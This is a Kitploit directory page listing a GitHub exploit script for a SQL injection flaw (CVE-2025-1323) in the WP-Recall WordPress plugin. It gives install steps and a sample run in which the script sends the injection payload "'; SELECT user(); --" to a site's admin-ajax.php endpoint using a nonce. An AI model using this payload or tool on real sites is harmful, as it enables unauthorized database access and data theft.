Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-1323 — WP-Recall Plugin SQL Injection | Kitploit
Tools/GitHubGitHub/p33d/cve-2025-1323
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubp33d/cve-2025-1323

cve-2025-1323

WP-Recall Plugin SQL Injection

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2025-1323

WP-Recall Plugin SQL Injection

⚠️ Legal Disclaimer

This tool is intended for authorized security testing and educational use only.
Do not use against systems without explicit permission. Misuse may be illegal.

✅ Requirements

  • Python 3.x
  • requests module

Install dependencies:

root@kitploit:~
pip install requests

python CVE-2025-1323.py

Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06

[*] Sending payload: '; SELECT user(); --

[+] Response received:
{"result":"SQL error or leaked data here..."}
Download Tool